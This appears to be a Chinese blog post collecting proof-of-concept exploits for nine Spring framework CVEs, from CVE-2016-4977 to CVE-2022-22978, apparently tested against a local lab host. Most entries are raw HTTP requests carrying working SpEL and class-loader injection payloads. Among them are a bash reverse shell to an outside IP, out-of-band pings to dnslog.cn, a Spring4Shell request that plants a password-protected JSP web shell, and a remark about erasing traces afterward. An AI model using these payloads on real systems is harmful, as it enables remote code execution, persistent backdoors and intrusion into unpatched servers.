- 1GitEe 使用教程 创建项目仓库并上传项目_gitee怎么创建仓库存放node项目
- 2CADD之分子对接二:简单autodockvina对接流程——redocking_autodock vina分子对接软件
- 3探索CompletableFuture:高效异步编程的利器_competablefuture之批量处理
- 4Liunx环境下的应用系统的安装部署与常用命令_jar包上传到服务器的命令
- 5AI集成工具平台一站式体验,零门槛使用国内外主流大模型_ai模型集成平台
- 6【机器学习】sklearn数据集的使用,数据集的获取和划分
- 7【保姆级教程】Spring Boot单元测试(Controller层的Header处有Token验证的详细示例代码),文末介绍Postman 的基本使用_springboot controller header
- 8微信小程序富文本处理/wxParse微信小程序富文本处理插件使用方法_wxparse下载
- 9【Pandas】深入解析Pandas中的统计汇总函数`astype()`_pandas astype
- 10Python环境配置教程(最新超详细图文版)
spring漏洞合集及其poc合集
赞
踩
1.Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
1)漏洞原理:
Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。
2)操作技巧:
需要输入密码admin : admin
http://192.168.68.129:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
3)漏洞版本:
2.0.0 to 2.0.9
1.0.0 to 1.0.5
2.Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)
1)漏洞原理:
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
2)操作技巧:
在post请求体中加上_eventId_confirm=&_csrf=4962b53e-b8c7-4290-8fa4-10dd87fd6ead&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.10.7/2233 +0>%261")).start()=vulhub
3)漏洞版本:Spring Web Flow 2.4.0 to 2.4.4
3.Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)
1)漏洞原理:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。
2)操作技巧:
PATCH /customers/1 HTTP/1.1
Host: 192.168.68.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 212
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{112,105,110,103,32,122,120,54,108,97,115,46,100,110,115,108,111,103,46,99,110}))/lastname", "value": "vulhub" }]
3)漏洞版本:
Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
Spring Boot version < 2.0.0M4
Spring Data release trains < Kay-RC3
4.Spring Messaging 远程命令执行漏洞(CVE-2018-1270)
1)漏洞原理:
2)操作技巧:
在app.js包中找到connect函数,加入var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"};
然后连接好,随便发送一个字段就可以
3)漏洞版本:
Spring Framework 5.0 to 5.0.4.
Spring Framework 4.3 to 4.3.14
5.Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
1)漏洞原理:
2)操作技巧:
POST /users?page=4&size=5 HTTP/1.1
Host: 192.168.68.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.129:8080/users?page=&size=5
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping 8hjpmg.dnslog.cn")]=&password=&repeatedPassword=
3)漏洞版本:
Spring Data Commons 1.13 to 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 to 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 to 3.0.5 (Kay SR5)
Older unsupported versions are also affected
6.Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
1)漏洞原理:
2)操作技巧:
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=040E58DCCE5809AD2948AC3AA317BE8D
If-None-Match: "3147526947+gzip"
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
Connection: close
Content-Type: application/json
Content-Length: 329
{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=040E58DCCE5809AD2948AC3AA317BE8D
If-None-Match: "3147526947+gzip"
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
访问http://192.168.68.129:8080/actuator/gateway/routes/hacktest
后续还有删除痕迹工作
3)漏洞版本:
Spring Cloud Gateway
3.1.0
3.0.0 to 3.0.6
Older, unsupported versions are also affected
7.Spring Cloud Function SpEL Code Injection (CVE-2022-22963)
1)漏洞原理:
2)操作技巧:
POST /functionRouter HTTP/1.1
Host: 192.168.68.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping 3692av.dnslog.cn")
Content-Type: text/plain
Content-Length: 4
test
3)漏洞版本:
Spring Cloud Function 3.1.6 3.2.2 Older, unsupported versions are also affected
8.Spring Framework RCE via Data Binding on JDK 9+ (CVE-2022-22965)
1)漏洞原理:
2)操作技巧:
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=84F9ECE52FD5260993C778C305D5BAD7
Connection: close
suffix:%>//
c1:Runtime
c2:<%
DNT:1
访问:http://192.168.68.129:8080/tomcatwar.jsp?pwd=j&cmd=id即可
3)漏洞版本:
Spring Framework
5.3.0 to 5.3.17
5.2.0 to 5.2.19
Older, unsupported versions are also affected
9.Spring Security Authorization Bypass in RegexRequestMatcher(CVE-2022-22978)
1)漏洞原理:
2)操作技巧:
http://192.168.68.129:8080/admin/%0atest
3)漏洞版本:
Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4
